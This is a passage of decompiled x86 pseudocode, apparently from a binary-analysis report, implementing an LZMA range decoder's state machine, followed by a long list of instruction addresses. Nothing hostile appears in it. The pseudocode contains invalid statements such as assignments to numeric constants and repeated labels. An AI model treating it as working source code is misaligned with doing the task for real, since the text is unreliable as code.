												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                              0x00000000
                                                              0x00406ffe
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407023
                                                              0x0040702a
                                                              0x00407030
                                                              0x00407036
                                                              0x00407048
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407004
                                                              0x0040700a
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
